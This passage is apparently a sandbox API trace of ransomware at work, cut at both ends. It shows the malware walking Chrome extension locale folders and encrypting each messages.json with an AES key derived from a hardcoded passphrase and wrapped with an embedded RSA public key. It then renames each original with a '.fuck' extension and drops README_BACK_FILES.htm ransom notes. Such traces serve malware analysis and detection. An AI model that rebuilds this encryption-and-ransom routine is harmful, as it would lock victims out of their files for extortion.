Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\nl\\messages.json", dwFileAttributes=0x80) returned 1 [0257.736] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\nl\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\nl\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0257.737] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\nl\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\nl\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0257.737] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\nl\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0257.738] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e799d8) returned 1 [0257.740] CryptCreateHash (in: hProv=0x2e799d8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0257.740] lstrlenA (lpString="WcJIVquNvpAEukoBQHzQwvMnzMlQm") returned 29 [0257.740] CryptHashData (hHash=0x2e180e8, pbData=0x28cb378, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0257.740] CryptDeriveKey (in: hProv=0x2e799d8, Algid=0x6610, hBaseData=0x2e180e8, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e194a8) returned 1 [0257.740] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----n", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0257.740] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0257.740] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e78d18) returned 1 [0257.740] CryptImportPublicKeyInfo (in: hCryptProv=0x2e78d18, dwCertEncodingType=0x1, pInfo=0x2e244d0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2e24500*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2e24508*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x28e7df8) returned 1 [0257.740] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0257.740] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e79840*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e79840*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0257.741] WriteFile (in: hFile=0x5d5c, lpBuffer=0x2e79840*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e79840*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0257.742] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0xb1, lpOverlapped=0x0) returned 1 [0257.742] CryptEncrypt (in: hKey=0x2e194a8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0xb1, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0xc0) returned 1 [0257.742] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0xc0, lpOverlapped=0x0) returned 1 [0257.743] CloseHandle (hObject=0x5d60) returned 1 [0257.743] CloseHandle (hObject=0x5d5c) returned 1 [0257.743] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\nl\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\nl\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\nl\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\nl\\messages.json"), bFailIfExists=0) returned 1 [0257.746] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\nl\\messages.json", dwFileAttributes=0x0) returned 1 [0257.746] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\nl\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\nl\\messages.json.gsg")) returned 1 [0257.747] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\nl\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\nl\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\nl\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\nl\\messages.json.fuck")) returned 1 [0257.748] CryptDestroyHash (hHash=0x2e180e8) returned 1 [0257.748] CryptDestroyKey (hKey=0x2e194a8) returned 1 [0257.748] CryptReleaseContext (hProv=0x2e799d8, dwFlags=0x0) returned 1 [0257.749] FindNextFileA (in: hFindFile=0x2985ea0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0257.749] FindClose (in: hFindFile=0x2985ea0 | out: hFindFile=0x2985ea0) returned 1 [0257.749] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\nl\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\nl\\readme_back_files.htm")) returned 0xffffffff [0257.749] AreFileApisANSI () returned 1 [0257.749] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4030, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0257.749] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\nl\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\nl\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0257.750] GetFileType (hFile=0x5d50) returned 0x1 [0257.750] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0257.751] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0257.751] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\no\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2938978 [0257.752] FindNextFileA (in: hFindFile=0x2938978, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0257.752] FindNextFileA (in: hFindFile=0x2938978, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0257.752] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0257.752] GetLastError () returned 0x0 [0257.752] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\no\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\no\\messages.json")) returned 0x20 [0257.753] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\no\\messages.json", dwFileAttributes=0x80) returned 1 [0257.753] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\no\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\no\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0257.754] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\no\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\no\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0257.755] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\no\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0257.755] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e79268) returned 1 [0257.757] CryptCreateHash (in: hProv=0x2e79268, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0257.757] lstrlenA (lpString="WcJIVquNvpAEukoBQHzQwvMnzMlQm") returned 29 [0257.757] CryptHashData (hHash=0x2e180e8, pbData=0x28cb4e0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0257.757] CryptDeriveKey (in: hProv=0x2e79268, Algid=0x6610, hBaseData=0x2e180e8, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e194a8) returned 1 [0257.757] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----n", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0257.757] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0257.757] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e791e0) returned 1 [0257.758] CryptImportPublicKeyInfo (in: hCryptProv=0x2e791e0, dwCertEncodingType=0x1, pInfo=0x2e24740*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2e24770*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2e24778*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2985ea0) returned 1 [0257.758] CryptEncrypt (in: hKey=0x2985ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0257.758] CryptEncrypt (in: hKey=0x2985ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e79510*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e79510*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0257.758] WriteFile (in: hFile=0x5d60, lpBuffer=0x2e79510*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e79510*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0257.759] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x96, lpOverlapped=0x0) returned 1 [0257.760] CryptEncrypt (in: hKey=0x2e194a8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x96, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0xa0) returned 1 [0257.760] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0xa0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0xa0, lpOverlapped=0x0) returned 1 [0257.760] CloseHandle (hObject=0x5d5c) returned 1 [0257.760] CloseHandle (hObject=0x5d60) returned 1 [0257.760] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\no\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\no\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\no\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\no\\messages.json"), bFailIfExists=0) returned 1 [0257.764] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\no\\messages.json", dwFileAttributes=0x0) returned 1 [0257.764] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\no\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\no\\messages.json.gsg")) returned 1 [0257.766] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\no\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\no\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\no\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\no\\messages.json.fuck")) returned 1 [0257.767] CryptDestroyHash (hHash=0x2e180e8) returned 1 [0257.767] CryptDestroyKey (hKey=0x2e194a8) returned 1 [0257.767] CryptReleaseContext (hProv=0x2e79268, dwFlags=0x0) returned 1 [0257.767] FindNextFileA (in: hFindFile=0x2938978, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0257.767] FindClose (in: hFindFile=0x2938978 | out: hFindFile=0x2938978) returned 1 [0257.767] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\no\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\no\\readme_back_files.htm")) returned 0xffffffff [0257.767] AreFileApisANSI () returned 1 [0257.767] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e33b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0257.767] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\no\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\no\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0257.768] GetFileType (hFile=0x5d50) returned 0x1 [0257.768] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0257.769] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0257.769] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\pl\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e180e8 [0257.769] FindNextFileA (in: hFindFile=0x2e180e8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0257.769] FindNextFileA (in: hFindFile=0x2e180e8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0257.769] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0257.769] GetLastError () returned 0x0 [0257.769] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\pl\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\pl\\messages.json")) returned 0x20 [0257.770] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\pl\\messages.json", dwFileAttributes=0x80) returned 1 [0257.770] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\pl\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\pl\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0257.770] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\pl\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\pl\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0257.771] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\pl\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0257.771] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e79730) returned 1 [0257.773] CryptCreateHash (in: hProv=0x2e79730, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0257.773] lstrlenA (lpString="WcJIVquNvpAEukoBQHzQwvMnzMlQm") returned 29 [0257.773] CryptHashData (hHash=0x2e18128, pbData=0x28cb4b8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0257.773] CryptDeriveKey (in: hProv=0x2e79730, Algid=0x6610, hBaseData=0x2e18128, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2938978) returned 1 [0257.774] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----n", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0257.774] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0257.774] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e79598) returned 1 [0257.774] CryptImportPublicKeyInfo (in: hCryptProv=0x2e79598, dwCertEncodingType=0x1, pInfo=0x2e25100*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2e25130*, 